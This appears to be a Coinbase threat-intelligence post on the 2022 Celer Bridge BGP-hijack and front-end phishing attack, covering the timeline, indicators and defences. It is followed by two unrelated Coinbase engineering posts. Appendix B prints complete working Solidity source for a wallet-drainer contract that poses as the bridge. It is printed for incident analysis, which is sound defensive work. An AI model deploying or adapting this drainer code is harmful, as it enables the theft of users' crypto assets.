
Celer Bridge incident analysis

Tl;dr: In this piece we share critical lessons about the nature of the Celer Bridge compromise, attacker on-chain and off-chain techniques and tactics during the incident, as well as security tips for similar projects and users. Building a better crypto ecosystem means building a better, more equitable future for us all. That’s why we are investing in the larger community to make sure anyone who wants to participate in the cryptoeconomy can do so in a secure way.

While the Celer bridge compromise does not directly affect Coinbase, we strongly believe that attacks on any crypto business are bad for the industry as a whole and hope the information in the blog will help strengthen and inform similar projects and their users about threats and techniques used by malicious actors.

By: Peter Kacherginsky, Threat Intelligence

On August 17, 2022, Celer Network Bridge dapp users were targeted in a front-end hijacking attack which lasted approximately 3 hours and resulted in 32 impacted victims and $235,000 USD in losses. The attack was the result of a Border Gateway Protocol (BGP) announcement that appeared to originate from the hosting provider QuickHostUk (AS-209243), which may itself be a victim. BGP hijacking is a unique attack vector that exploits weaknesses and trust relationships in the Internet’s core routing architecture; it was used earlier this year to target other cryptocurrency projects such as KLAYswap.

Unlike the Nomad Bridge compromise on August 1, 2022, this front-end hijacking targeted users of the Celer platform dapp rather than the project’s liquidity pools. In this case, Celer UI users with assets on the Ethereum, BSC, Polygon, Optimism, Fantom, Arbitrum, Avalanche, Metis, Astar, and Aurora networks were presented with specially crafted smart contracts designed to steal their funds.

Impact

Ethereum users suffered the largest monetary losses with a single victim losing $156K USD. The largest number of victims on a single network were using BSC, while users of other chains like Avalanche and Metis suffered no losses.

Compromise Analysis

The attacker performed initial preparation on August 12, 2022 by deploying a series of malicious smart contracts on the Ethereum, Binance Smart Chain (BSC), Polygon, Optimism, Fantom, Arbitrum, Avalanche, Metis, Astar, and Aurora networks. Preparation for the BGP route hijacking took place on August 16, 2022, and the attack itself began on August 17, 2022, when the attacker took over a subdomain responsible for serving dapp users with the latest bridge contract addresses; it lasted approximately 3 hours. The attack stopped shortly after an announcement by the Celer team, at which point the attacker started moving funds to Tornado Cash.

The following sections explore each of the attack stages in more detail, as well as the Incident Timeline, which follows the attacker over the 7-day period.

BGP Hijacking Analysis

The attack targeted the cbridge-prod2.celer.network subdomain, which hosted critical smart contract configuration data for the Celer Bridge user interface (UI). Prior to the attack, cbridge-prod2.celer.network (44.235.216.69) was served by AS-16509 (Amazon) via the 44.224.0.0/11 route.

On August 16, 2022 17:21:13 UTC, a malicious actor created routing registry entries for MAINT-QUICKHOSTUK and added a 44.235.216.0/24 route to the Internet Routing Registry (IRR) in preparation for the attack:

Figure 1 — Pre-attack router configuration (source: Misaka NRTM log by Siyuan Miao)

Starting on August 17, 2022 19:39:50 UTC, a new, more specific 44.235.216.0/24 route began propagating with a different origin than before, AS-14618 (Amazon), and a new upstream, AS-209243 (QuickHostUk):

Figure 2 — Malicious route announcement (source: RIPE Raw Data Archive)

Since 44.235.216.0/24 is more specific than 44.224.0.0/11, traffic destined for cbridge-prod2.celer.network started flowing through AS-209243 (QuickHostUk), where the attacker replaced key smart contract parameters as described in the Malicious Dapp Analysis section below.

Figure 3 — Network map after BGP hijacking (source: RIPE)
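
The hijack worked because routers prefer the most specific matching prefix. As a quick illustration (ours, not part of the original routing data), Python’s standard ipaddress module can verify the relationship between the two prefixes involved:

import ipaddress

legit = ipaddress.ip_network("44.224.0.0/11")     # Amazon's original covering route
hijack = ipaddress.ip_network("44.235.216.0/24")  # the attacker's more specific route
victim = ipaddress.ip_address("44.235.216.69")    # cbridge-prod2.celer.network

# Both routes cover the victim IP...
assert victim in legit and victim in hijack
# ...but longest-prefix matching prefers the /24, so traffic follows the hijack.
assert hijack.subnet_of(legit) and hijack.prefixlen > legit.prefixlen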

In order to intercept rerouted traffic, the attacker created a valid certificate for the target domain first observed at 2022–08–17 19:42 UTC using GoGetSSL, an SSL certificate provider based in Latvia. [1] [2]

Figure 4 — Malicious certificate (source: Censys)

Prior to the attack, Celer used SSL certificates issued by Let’s Encrypt and Amazon for its domains.

On August 17, 2022 20:22:12 UTC the malicious route was withdrawn by multiple Autonomous Systems (ASs):

Figure 5 — Malicious route withdrawal (source: RIPE Raw Data Archive)

Shortly after, at 23:08:47 UTC, Amazon announced 44.235.216.0/24 to reclaim the hijacked traffic:

Figure 6 — Amazon claiming hijacked route (source: RIPE Raw Data Archive)

The first theft of funds through a phishing contract occurred at 2022–08–17 19:51 UTC on the Fantom network, and thefts continued until 2022–08–17 21:49 UTC, when the last user lost assets on the BSC network. This aligns with the timeline above concerning the project’s network infrastructure.

Malicious Dapp Analysis

The attack targeted a smart contract configuration resource hosted on cbridge-prod2.celer.network, such as https://cbridge-prod2.celer.network/v1/getTransferConfigsForAll, which holds per-chain bridge contract addresses. Modifying any of the bridge addresses results in victims approving and/or sending assets to a malicious contract. Below is a sample modified entry redirecting Ethereum users to the malicious contract 0x2A2a…18E8.

Figure 7 — Sample Celer Bridge configuration (source: Coinbase TI analysis)

See Appendix A for a comprehensive listing of malicious contracts created by the attacker.

Phishing Contract Analysis

The phishing contract closely resembles the official Celer Bridge contract, mimicking many of its attributes. Any method not explicitly defined in the phishing contract is forwarded to the legitimate Celer Bridge contract through a proxy structure. The proxied contract is unique to each chain and is configured on initialization. The command below illustrates the contents of the storage slot responsible for the phishing contract’s proxy configuration:

Figure 8 — Phishing smart contract proxy storage (source: Coinbase TI analysis)
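
The same inspection can be reproduced with any Ethereum JSON-RPC client. Below is a minimal web3.py sketch; the RPC URL is a placeholder, and slot 1 corresponds to the celerBridge variable in the reverse engineered source in Appendix B:

from web3 import Web3

# Placeholder RPC endpoint; substitute any Ethereum JSON-RPC provider.
w3 = Web3(Web3.HTTPProvider("https://ethereum-rpc.example.com"))

phishing_contract = "0x2A2aA50450811Ae589847D670cB913dF763318E8"

# Slot 0 holds the attacker address; slot 1 holds the proxied Celer Bridge
# address (see the sload(1) in the fallback of the contract in Appendix B).
raw = w3.eth.get_storage_at(phishing_contract, 1)
print("0x" + raw.hex()[-40:])  # the legitimate bridge address the proxy forwards to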

The phishing contract steals users’ funds using two approaches:

  • Any tokens approved by phishing victims are drained using a custom method with the 4-byte selector 0x9c307de6.
  • The phishing contract overrides the following methods to immediately steal a victim’s assets:
    • send() — used to steal tokens (e.g. USDC)
    • sendNative() — used to steal native assets (e.g. ETH)
    • addLiquidity() — used to steal tokens (e.g. USDC)
    • addNativeLiquidity() — used to steal native assets (e.g. ETH)

Below is a sample reverse engineered snippet which redirects assets to the attacker wallet:

Figure 9 — Phishing smart contract snippet (source: Coinbase TI analysis)

See Appendix B for the complete reverse engineered source code.

Swapping and Obfuscating Funds

During and immediately following the attack:

  1. The attacker swapped stolen tokens on Curve, Uniswap, TraderJoe, AuroraSwap, and other chain-specific DEXs into each chain’s native assets or wrapped ETH.
  2. The attacker bridged all assets from Step 1 to Ethereum.
  3. The attacker then proceeded to swap the remaining tokens on Uniswap to ETH.
  4. Finally, the attacker sent 127 ETH at 2022–08–17 22:33 UTC and another 1.4 ETH at 2022–08–18 01:01 UTC to Tornado Cash.

Following the steps outlined above, the attacker deposited the remaining 0.01201403570756 ETH to 0x6614…fcd9, an address which had previously received funds from, and fed into, Binance through 0xd85f…4ed8.

The diagram below illustrates the multi-chain bridging and swapping flow used by the attacker prior to sending assets to Tornado Cash:

Figure 10 — Asset swapping and obfuscation diagram (source: Coinbase TI)

Interestingly, more than 4 hours after the last theft transaction at 2022–08–17 21:49 UTC from a victim on BSC, there was another transfer at 2022–08–18 02:37 UTC by 0xe35c…aa9d on BSC. This address was funded minutes before the transaction by 0x975d…d94b using ChangeNow.

Attacker Profile

The attacker was well prepared and methodical in how they constructed phishing contracts. For each chain and deployment, the attacker painstakingly tested their contracts with previously transferred sample tokens. This allowed them to catch multiple deployment bugs prior to the attack.

The attacker was very familiar with available bridging protocols and DEXs, even on more esoteric chains like Aurora, as shown by how rapidly they exchanged, bridged, and obfuscated stolen assets once the attack was discovered. Notably, the threat actor chose to target less popular chains like Metis, Astar, and Aurora while going to great lengths to send test funds through multiple bridges.

Transactions across chains and stages of the attack were serialized, indicating a single operator was likely behind the attack.

Performing a BGP hijacking attack requires a specialized networking skill set, one which the attacker may have used in past attacks.

Protecting Yourself

Web3 projects do not exist in a vacuum: they still depend on traditional web2 infrastructure for many of their critical components, such as dapp hosting services, domain registrars, blockchain gateways, and the core Internet routing infrastructure. This dependency introduces traditional threats such as BGP and DNS hijacking, domain registrar takeover, and web exploitation to otherwise decentralized products. Below are several steps which may be used to mitigate these threats in appropriate cases:

Enable the following security controls, or consider using hosting providers that have enabled them, to protect a project’s infrastructure:

  • RPKI to protect hosting routing infrastructure.
  • DNSSEC and CAA to protect domain and certificate services.
  • Multifactor authentication or enhanced account protection on hosting, domain registrar, and other services.
  • Limit and log access to the above services, and review that access regularly.

Implement the following monitoring both for the project and its dependencies:

  • Implement BGP monitoring to detect unexpected changes to routes and prefixes (e.g. BGPAlerter)
  • Implement DNS monitoring to detect unexpected record changes ( e.g. DNSCheck)
  • Implement certificate transparency log monitoring to detect unknown certificates associated with the project’s domain (e.g. Certstream; see the sketch after this list)
  • Implement dapp monitoring to detect unexpected smart contract addresses presented by the front-end architecture
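
To make the certificate transparency item concrete, below is a minimal monitoring sketch using the open source certstream Python client. The watched domain and the alert action are placeholders, and the endpoint is the public one from the certstream documentation; recall that a GoGetSSL certificate for cbridge-prod2.celer.network appearing in CT logs was precisely the signal available during this incident:

import certstream

WATCHED = ("celer.network",)  # domains whose certificates you expect to control

def on_cert(message, context):
    # certstream emits one message per certificate observed in public CT logs.
    if message["message_type"] != "certificate_update":
        return
    domains = message["data"]["leaf_cert"]["all_domains"]
    if any(d == w or d.endswith("." + w) for d in domains for w in WATCHED):
        print("New certificate observed for watched domain:", domains)  # alert here

certstream.listen_for_events(on_cert, url="wss://certstream.calidog.io/")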

DeFi users can protect themselves from front-end hijacking attacks by adopting the following practices:

  • Verify that smart contract addresses presented by a dapp match the project’s official documentation, when available.
  • Exercise vigilance when signing or approving transactions.
  • Use a hardware wallet or other cold storage solution to protect assets you don’t regularly use.
  • Periodically review and revoke any contract approvals you don’t actively need (see the sketch after this list).
  • Follow the project’s social media feeds for security announcements.
  • Use wallet software capable of blocking malicious threats (e.g. Coinbase Wallet).
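
As a sketch of the approval-review practice above, the following web3.py snippet checks and revokes an ERC-20 allowance. The RPC endpoint and all addresses are placeholders, and the ABI is trimmed to the two standard ERC-20 functions involved:

from web3 import Web3

w3 = Web3(Web3.HTTPProvider("https://ethereum-rpc.example.com"))  # placeholder RPC

# Minimal ERC-20 ABI: just allowance() and approve().
ERC20_ABI = [
    {"name": "allowance", "type": "function", "stateMutability": "view",
     "inputs": [{"name": "owner", "type": "address"},
                {"name": "spender", "type": "address"}],
     "outputs": [{"name": "", "type": "uint256"}]},
    {"name": "approve", "type": "function", "stateMutability": "nonpayable",
     "inputs": [{"name": "spender", "type": "address"},
                {"name": "amount", "type": "uint256"}],
     "outputs": [{"name": "", "type": "bool"}]},
]

# Placeholder addresses: the token, the spender under review, and your wallet.
TOKEN = "0x0000000000000000000000000000000000000001"
SPENDER = "0x0000000000000000000000000000000000000002"
WALLET = "0x0000000000000000000000000000000000000003"

token = w3.eth.contract(address=TOKEN, abi=ERC20_ABI)
print("current allowance:", token.functions.allowance(WALLET, SPENDER).call())

# Revoking an approval is simply approving zero; sign and send from your wallet.
tx = token.functions.approve(SPENDER, 0).build_transaction({"from": WALLET})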

Coinbase is committed to improving our security and the wider industry’s security, as well as protecting our users. We believe that exploits like these can be mitigated and ultimately prevented. Besides making codebases open source for the public to review, we recommend frequent protocol audits, implementation of bug bounty programs, and partnering with security researchers. Although this exploit was a difficult learning experience for those affected, we believe that understanding how the exploit occurred can only help further mature our industry.

We understand that trust is built on dependable security — which is why we make protecting your account & your digital assets our number one priority. Learn more here.

Incident Timeline

Stage 1: Preparation

Funding

2022–08–12 14:33 UTC — 0xb0f5…30dd funded from Tornado Cash on Ethereum.

Bridging to BSC, Polygon, Optimism, Fantom, Arbitrum, and Avalanche

2022–08–12 14:41 UTC — 0xb0f5…30dd begins moving funds to BSC, Polygon, Optimism, Fantom, Arbitrum, and Avalanche using ChainHop on Ethereum.

BSC deployment

2022–08–12 14:56 UTC — 0xb0f5…30dd deploys 0x9c8b…c9f9 phishing contract on BSC.

NOTE: Attacker forgot to specify Celer proxy contract.

2022–08–12 17:30 UTC — 0xb0f5…30dd deploys 0x5895…e7cf phishing contract on BSC and tests token retrieval.

Fantom deployment

2022–08–12 18:29 UTC — 0xb0f5…30dd deploys 0x9c8b…c9f9 phishing contract on Fantom.

NOTE: Attacker specified the wrong Celer proxy from the BSC network.

2022–08–12 18:30 UTC — 0xb0f5…30dd deploys 0x458f…f972 phishing contract on Fantom and tests token retrieval.

Bridging to Astar and Aurora

2022–08–12 18:36 UTC — 0xb0f5…30dd moves funds to Astar and Aurora using Celer Bridge on BSC.

Astar deployment

2022–08–12 18:41 UTC — 0xb0f5…30dd deploys 0x9c8b…c9f9 phishing contract on Astar.

Polygon deployment

2022–08–12 18:57 UTC — 0xb0f5…30dd deploys 0x9c8b…c9f9 phishing contract on Polygon

Optimism deployment

2022–08–12 19:07 UTC — 0xb0f5…30dd deploys 0x9c8b…c9f9 phishing contract on Optimism and tests token retrieval.

Bridging to Metis

2022–08–12 19:12 UTC — 0xb0f5…30dd continues moving funds to Metis using Celer Bridge on Ethereum.

Arbitrum deployment

2022–08–12 19:20 UTC — 0xb0f5…30dd deploys 0x9c8b…c9f9 phishing contract on Arbitrum and tests token retrieval.

Metis deployment

2022–08–12 19:24 UTC — 0xb0f5…30dd deploys 0x9c8b…c9f9 phishing contract on Metis and tests token retrieval.

Avalanche deployment

2022–08–12 19:28 UTC — 0xb0f5…30dd deploys 0x9c8b…c9f9 phishing contract on Avalanche and tests token retrieval.

Aurora deployment

2022–08–12 19:40 UTC — 0xb0f5…30dd deploys 0x9c8b…c9f9 phishing contract on Aurora.

Ethereum deployment

2022–08–12 19:50 UTC — 0xb0f5…30dd deploys 0x2a2a…18e8 phishing contract on Ethereum and tests token retrieval.

Routing Infrastructure configuration

2022–08–16 17:21 UTC — Attacker updates IRR with AS209243, AS16509 members.

2022–08–16 17:36 UTC — Attacker updates IRR to handle 44.235.216.0/24 route.

Stage 2: Attack

2022–08–17 19:39 UTC — BGP Hijacking of 44.235.216.0/24 route.

2022–08–17 19:42 UTC — New SSL certificates observed for cbridge-prod2.celer.network [1] [2]

2022–08–17 19:51 UTC — First victim observed on Fantom.

2022–08–17 21:49 UTC — Last victim observed on BSC.

2022–08–17 21:56 UTC — Celer Twitter shares reports about a security incident.

2022–08–17 22:12 UTC — BGP Hijacking ends and 44.235.216.0/24 route withdrawn.

Stage 3: Post-Attack Swapping and Obfuscation

2022–08–17 22:33 UTC — Begin depositing 127 ETH to Tornado Cash on Ethereum.

2022–08–17 23:08 UTC — Amazon AS-16509 claims 44.235.216.0/24 route.

2022–08–17 23:45 UTC — The last bridging transaction to Ethereum from Optimism.

2022–08–17 23:48 UTC — The last bridging transaction to Ethereum from Polygon.

2022–08–17 23:53 UTC — The last bridging transaction to Ethereum from Arbitrum.

2022–08–18 00:01 UTC — The last bridging transaction to Ethereum from Avalanche.

2022–08–18 00:17 UTC — The last bridging transaction to Ethereum from Aurora.

2022–08–18 00:21 UTC — The last bridging transaction to Ethereum from Fantom.

2022–08–18 00:26 UTC — The last bridging transaction to Ethereum from BSC.

2022–08–18 01:01 UTC — Begin depositing 1.4 ETH to Tornado Cash on Ethereum.

2022–08–18 01:33 UTC — Transfer 0.01201403570756 ETH to 0x6614…fcd9.

Indicators

Ethereum: 0xb0f5fa0cd2726844526e3f70e76f54c6d91530dd

Ethereum: 0x2A2aA50450811Ae589847D670cB913dF763318E8

Ethereum: 0x66140a95d189846e74243a75b14fe6128dbbfcd9

BSC: 0x5895da888Cbf3656D8f51E5Df9FD26E8E131e7CF

Fantom: 0x458f4d7ef4fb1a0e56b36bf7a403df830cfdf972

Polygon: 0x9c8b72f0d43ba23b96b878f1c1f75edc2beec9f9

Avalanche: 0x9c8B72f0D43BA23B96B878F1c1F75EdC2Beec9F9

Arbitrum: 0x9c8B72f0D43BA23B96B878F1c1F75EdC2Beec9F9

Astar: 0x9c8B72f0D43BA23B96B878F1c1F75EdC2Beec9F9

Aurora: 0x9c8b72f0d43ba23b96b878f1c1f75edc2beec9f9

Optimism: 0x9c8b72f0d43ba23b96b878f1c1f75edc2beec9f9

Metis: 0x9c8B72f0D43BA23B96B878F1c1F75EdC2Beec9F9

AS: 209243 (AS number observed in the path on routing announcements and as a maintainer for the prefix in IRR changes)

Appendix A: Phishing smart contracts

Ethereum

0x2a2aa50450811ae589847d670cb913df763318e8

BSC

0x9c8b72f0d43ba23b96b878f1c1f75edc2beec9f9

0x11f8c7cdf73b71cd189bb2a7f285dabfe8957f9c

0xc8dd7eadef50a659c480c6fa18863e354e12fc4f

0x5895da888cbf3656d8f51e5df9fd26e8e131e7cf

Polygon

0x9c8b72f0d43ba23b96b878f1c1f75edc2beec9f9

Fantom

0x9c8b72f0d43ba23b96b878f1c1f75edc2beec9f9

0x458f4d7ef4fb1a0e56b36bf7a403df830cfdf972

Arbitrum

0x9c8b72f0d43ba23b96b878f1c1f75edc2beec9f9

Avalanche

0x9c8b72f0d43ba23b96b878f1c1f75edc2beec9f9

Astar

0x9c8B72f0D43BA23B96B878F1c1F75EdC2Beec9F9

Aurora

0x9c8b72f0d43ba23b96b878f1c1f75edc2beec9f9

Metis

0x9c8b72f0d43ba23b96b878f1c1f75edc2beec9f9

Appendix B: Phishing smart contract source code (RE)

The following reverse engineered contract is based on the bytecode at 0x2a2a…18e8:

pragma solidity ^0.8.0;

import "./IERC20.sol";

contract CelerPhish {
    // Storage slot 0: recipient of stolen funds.
    address attacker;
    // Storage slot 1: the legitimate Celer Bridge, used by the fallback proxy.
    address celerBridge;

    constructor(address _celerBridge) {
        attacker = msg.sender;
        celerBridge = _celerBridge;
    }

    function sendNative(address _receiver, uint256 _amount, uint64 _dstChainId, uint64 _nonce, uint32 _maxSlippage) public payable {
        require(msg.data.length - 4 >= 160);
        if (msg.value > 0) {
            (bool success, ) = attacker.call{value: msg.value}("");
            require(success);
        }
    }

    function addLiquidity(address _token, uint256 _amount) public {
        steal(msg.sender, _token);
    }

    function addNativeLiquidity(uint256 _amount) public payable {
        require(msg.data.length - 4 >= 32);
        if (msg.value > 0) {
            (bool success, ) = attacker.call{value: msg.value}("");
            require(success);
        }
    }

    // Steals approved funds; originally the 0x9c307de6 4-byte selector.
    function stealApprovedTokens(address token, address recipient) public {
        require(msg.data.length - 4 >= 64);
        steal(recipient, token);
    }

    function send(address _receiver, address _token, uint256 _amount, uint64 _dstChainId, uint64 _nonce, uint32 _maxSlippage) public {
        require(msg.data.length - 4 >= 192);
        steal(msg.sender, _token);
    }

    // Steals assets: drains whichever is smaller, the balance or the allowance.
    function steal(address recipient, address token) private {
        uint256 balance = IERC20(token).balanceOf(recipient);
        uint256 allowance = IERC20(token).allowance(recipient, address(this));
        if (balance > 0 && allowance > 0) {
            if (balance >= allowance) {
                bool success = IERC20(token).transferFrom(recipient, attacker, allowance);
                require(success);
            } else {
                bool success = IERC20(token).transferFrom(recipient, attacker, balance);
                require(success);
            }
        }
    }

    // Forward all other calls to the Celer Bridge stored in slot 1.
    // EIP-1822: https://eips.ethereum.org/EIPS/eip-1822
    fallback() external payable {
        assembly { // solium-disable-line
            let contractLogic := sload(1)
            calldatacopy(0x0, 0x0, calldatasize())
            let success := delegatecall(sub(gas(), 10000), contractLogic, 0x0, calldatasize(), 0, 0)
            let retSz := returndatasize()
            returndatacopy(0, 0, retSz)
            switch success
            case 0 {
                revert(0, retSz)
            }
            default {
                return(0, retSz)
            }
        }
    }
}


Real-time reconciliation with Overseer

Tl;dr: A common challenge with distributed systems is how to ensure that state remains synchronized across systems. At Coinbase, this is an important problem for us as many transactions flow through our microservices every day and we need to ensure that these systems agree on a given transaction. In this blog post, we’ll deep-dive into Overseer, the system Coinbase created to provide us with the ability to perform real-time reconciliation.

By Cedric Cordenier, Senior Software Engineer

Every day, transactions are processed by Coinbase’s payments infrastructure. Processing each of these transactions successfully means completing a complex workflow involving multiple microservices. These microservices range from “front-office” services, such as the product frontend and backend, to “back-office” services such as our internal ledger, to the systems responsible for interacting with our banking partners or executing the transaction on chain.

All of the systems involved in processing a transaction store some state relating to it, and we need to ensure that they agree on what happened to the transaction. To solve this coordination problem, we use orchestration engines like Cadence and techniques such as retries and idempotency to ensure that the transactions are eventually executed correctly.

Despite this effort, the systems occasionally disagree on what happened, preventing the transaction from completing. The causes of this blockage are varied, ranging from bugs to outages affecting the systems involved in processing. Historically, unblocking these transactions has involved significant operational toil, and our infrastructure to tackle this problem has been imperfect.

In particular, our systems have lacked an exhaustive and immutable record of all of the actions taken when processing a transaction, including actions taken during incident remediation, and have been unable to verify the consistency of a transaction holistically, in real time, across the entire range of systems involved. Our existing process relied on ETL pipelines, which meant delays of up to 24 hours before recent transaction data became accessible.

To solve this problem, we created Overseer, a system to perform near real-time reconciliation of distributed systems. Overseer has been designed with the following in mind:

  • Extensibility: Writing a new check is as simple as writing a function, and adding a new data source is a matter of configuration in the average case. This makes it easy for new teams to onboard checks onto the Overseer platform.
  • Scalability: As of today, our internal metrics show that Overseer is capable of handling more than 30k messages per second.
  • Accuracy: Overseer travels through time and intelligently delays running a check for a short time to compensate for delays in receiving data, thus reducing the number of false negatives.
  • Near real-time: Overseer has a time to detect (TTD) of less than 1 minute on average.

Architecture

At a high level, the architecture of Overseer consists of the following three services:

  • The ingestion service is how any new data enters Overseer. The service is responsible for receiving update notifications from the databases to which Overseer subscribes, storing the updates in S3, and notifying the upstream processors runner service (PRS) of each update.
  • The data access layer service (DAL) is how services access the data stored in S3. Each update is stored as a single, immutable object in S3, and the DAL is responsible for aggregating the updates into a canonical view of a record at a given point in time. The DAL also serves as the semantic layer on top of S3, translating data from its at-rest representation — which makes no assumptions about the schema or format of the data — into protobufs, and defining the join relationships necessary to stitch multiple related records into a data view.
  • The processors runner service (PRS) receives these notifications and determines which checks — also known as processors — are applicable to the notification. Before running the check, it calls the data access layer service to fetch the data view required to perform the check.

The Ingestion Service

A predominant design goal of the ingestion service is to support any format of incoming data. As we look to integrate Overseer into all of Coinbase’s systems in the future, it is crucial that the platform is built to easily and efficiently add new data sources.

Our typical pattern for receiving events from an upstream data source is to tail its database’s WAL (write-ahead log). We chose this approach for a few reasons:

  • Coinbase has a small number of database technologies that are considered “paved road”, so by supporting the data format emitted by the WAL, we can make it easy to onboard the majority of our services.
  • Tailing the WAL also ensures a high level of data fidelity as we are replicating directly what’s in the database. This eliminates a class of errors which the alternative — to have upstream data sources emit change events at the application level — would expose us to.

The ingestion service is able to support any data format due to how data is stored and later retrieved. When the ingestion service receives an update, it creates two artifacts — the update document and the master document.

  • The update document contains the update event exactly as we received it from the upstream source, in its original format (protobuf bytes, JSON, BSON, etc) and adds metadata such as the unique identifier for the record being modified.
  • The master document aggregates all of the references found in updates belonging to a single database model. Together, these documents serve as an index Overseer can use to join records together.

When the ingestion service receives an update for a record, it extracts these references and either creates a master document with the references (if the event is an insert event), or updates an existing master document with any new references (if the event is an update event). In other words, ingesting a new data format is just a matter of storing the raw event and extracting its metadata, such as the record identifier, or any references it has to other records.

To achieve this, the ingestion service has the concept of a consumer abstraction. Consumers translate a given input format into the two artifacts mentioned above, and new data sources can be onboarded through configuration, tying the data source to the consumer to use at runtime.
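
Overseer’s consumer interface is internal, but the description above implies a shape roughly like the following sketch; all names here are hypothetical:

from dataclasses import dataclass
from typing import Protocol

@dataclass
class UpdateDocument:
    record_id: str  # unique identifier extracted from the event
    raw: bytes      # the event exactly as received (protobuf bytes, JSON, BSON, ...)
    source: str     # which upstream database emitted it

@dataclass
class MasterDocument:
    record_id: str
    references: set[str]  # ids of related records, used later to join data views

class Consumer(Protocol):
    """Translates one input format into the two ingestion artifacts."""
    def consume(self, event: bytes) -> tuple[UpdateDocument, MasterDocument]: ...

# Onboarding a new source is then configuration: map the source to a consumer,
# e.g. {"mongo": MongoConsumer(), "postgres": PostgresConsumer()}.
CONSUMERS: dict[str, Consumer] = {}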

However, this is just one part of the equation. The ability to store arbitrary data is only useful if we can later retrieve it and give it some semantic meaning. This is where the Data Access Layer (DAL) is useful.

DAL, Overseer’s semantic layer

To understand the role played by DAL, let’s examine a typical update event from the perspective of a hypothetical Toy model, which has the schema described below:

type Toy struct {
    Type  string
    Color string
    Id    string
}

We’ll further assume that our Toy model is hosted in a MongoDB collection, such that change events will have the raw format described here. For our example Toy record, we’ve recorded two events: one creating it, and a subsequent update. The first event looks approximately like this, with some irrelevant details and fields elided:

{
  "_id": "22914ec8-4687-4428-8cab-e0fd21c6b3b6",
  "fullDocument": {
    "type": "watergun",
    "color": "blue"
  },
  "clusterTime": 1658224073
}

And, the second, like this:

{
  "_id": "22914ec8-4687-4428-8cab-e0fd21c6b3b6",
  "updateDescription": {
    "updatedFields": {
      "type": "balloon"
    }
  },
  "clusterTime": 1658224074
}

We mentioned earlier that DAL serves as the semantic layer on top of Overseer’s storage. This means it performs three functions with respect to this data:

Time travel: retrieving the updates belonging to a record up to a given timestamp. In our example, this could mean retrieving either the first or both of these updates.

Aggregation: transforming the updates into a view of the record at a point in time, and serializing this into DAL’s output format, protobufs.

Exposing data views: joining related records together into the views consumed by checks, covered in its own section below.

In our case, the updates above can be transformed to describe the record at two points in time, namely after the first update, and after the second update. If we were interested in knowing what the record looked like on creation, we would transform the updates by fetching the first update’s “fullDocument” field. This would result in the following:

proto.Toy{
    Type:  "watergun",
    Id:    "22914ec8-4687-4428-8cab-e0fd21c6b3b6",
    Color: "blue",
}

However, if we wanted to know what the record would look like after the second update, we would instead take the “fullDocument” of the initial update and apply the contents of the “updateDescription” field of subsequent updates. This would yield:

proto.Toy{
    Type:  "balloon",
    Id:    "22914ec8-4687-4428-8cab-e0fd21c6b3b6",
    Color: "blue",
}

This example contains two important insights:

  • First, the algorithm required to aggregate updates depends on the input format of the data. Accordingly, DAL encapsulates the aggregation logic for each type of input data, and has aggregators (called “builders”) for all of the formats we support, such as Mongo or Postgres for example.
  • Second, aggregating updates is a stateless process. In an earlier version of Overseer, the ingestion service was responsible for generating the latest state of a model in addition to storing the raw update event. This was performant but led to significantly reduced developer velocity, since any errors in our aggregators required a costly backfill to correct.

Exposing data views

Checks running in Overseer operate on arbitrary data views. Depending on the needs of the check being performed, these views can contain a single record or multiple records joined together. In the latter case, DAL provides the ability to identify sibling records by querying the collection of master records built by the ingestion service.

PRS, a platform for running checks

As we mentioned previously, Overseer was designed to be easily extensible, and nowhere is this more important than in the design of the PRS. From the outset, our design goal was to make adding a new check as easy as writing a function, while retaining the flexibility to handle the variety of use cases Overseer was intended to serve.

A check is any function which does the following two things:

  1. It makes assertions when given data. A check can declare which data it needs by accepting a data view provided by DAL as a function argument.
  2. It specifies an escalation policy: i.e. given a failing assertion, it makes a decision on how to proceed. This could be as simple as emitting a log, or creating an incident in PagerDuty, or performing any other action decided by the owner of the check.

Keeping checks this simple facilitates onboarding — testing is particularly easy as a check is just a function which accepts some inputs and emits some side effects — but requires PRS to handle a lot of complexity automatically. To understand this complexity, it’s helpful to gain an overview of the lifecycle of an update notification inside Overseer. In the architecture overview at the beginning of this post, we saw how updates are stored by the ingestion service in S3 and how the ingestion service emits a notification to PRS via an events topic. Once a message has been received by PRS, it goes through the following flow:

  • Selection: PRS determines which checks should be triggered by the given event.
  • Scheduling: PRS determines when and how a check should be scheduled. This happens via what we call “execution strategies”. These can come in various forms, but basic execution strategies might execute a check immediately (i.e. do nothing), or delay a check by a fixed amount of time, which can be useful for enforcing SLAs. The default execution strategy is more complex. It drives down the rate of false negatives by determining the relative freshness of the data sources that Overseer listens to, and may choose to delay a check — thus sacrificing a little bit of our TTD — to allow lagging sources to catch up.
  • Translation: maps the event received to the specific data view required by the check. During this step, PRS queries the DAL to fetch the records needed to perform the check.
  • Execution: finally, PRS calls the check code.

Checks are registered with the framework through a lightweight domain-specific language (DSL). This DSL makes it possible to register a check in a single line of code, with sensible defaults specifying the behavior in terms of what should trigger a check (the selection stage), how to schedule a check, and what view it requires (the translation stage). For more advanced use cases, the DSL also acts as an escape hatch by allowing users to customize the behavior of their check at each of these stages.
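
Overseer’s DSL is internal to Coinbase, but the description above suggests a shape along the following lines; every name in this sketch is hypothetical:

from dataclasses import dataclass

# --- Stand-ins for the framework, to keep the sketch self-contained ---
CHECKS: list[dict] = []

def register_check(fn, *, triggered_by: str, view: type) -> None:
    # Selection and translation metadata; PRS would use this to route events.
    CHECKS.append({"fn": fn, "topic": triggered_by, "view": view})

def page(channel: str, msg: str) -> None:
    print(f"PAGE {channel}: {msg}")  # escalation placeholder (PagerDuty, a log, ...)

# --- A check: a plain function over a DAL-provided data view ---
@dataclass
class ToyView:
    type: str
    color: str

def toy_color_check(view: ToyView) -> None:
    if view.type == "balloon" and view.color != "blue":
        page("#toys-oncall", f"unexpected color: {view.color}")

# One line to register; scheduling falls back to the default execution strategy.
register_check(toy_color_check, triggered_by="toys", view=ToyView)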

Today, Overseer processes more than 30,000 messages per second, and supports four separate use cases in production, with a goal to add two more by the end of Q3. This is a significant milestone for the project which has been in incubation for more than a year, and required overcoming a number of technical challenges, and multiple changes to Overseer’s architecture.

This project has been a true team effort, and would not have been possible without the help and support of the Financial Hub product and engineering leadership, and members of the Financial Hub Transfers and Transaction Intelligence teams.



Building a Python ecosystem for efficient and reliable development

Tl;dr: This blog post describes how we developed an efficient, reliable Python ecosystem using Pants, an open source build system, and solved the challenge of managing Python applications at a large scale at Coinbase.

By The Coinbase Compute Platform Team

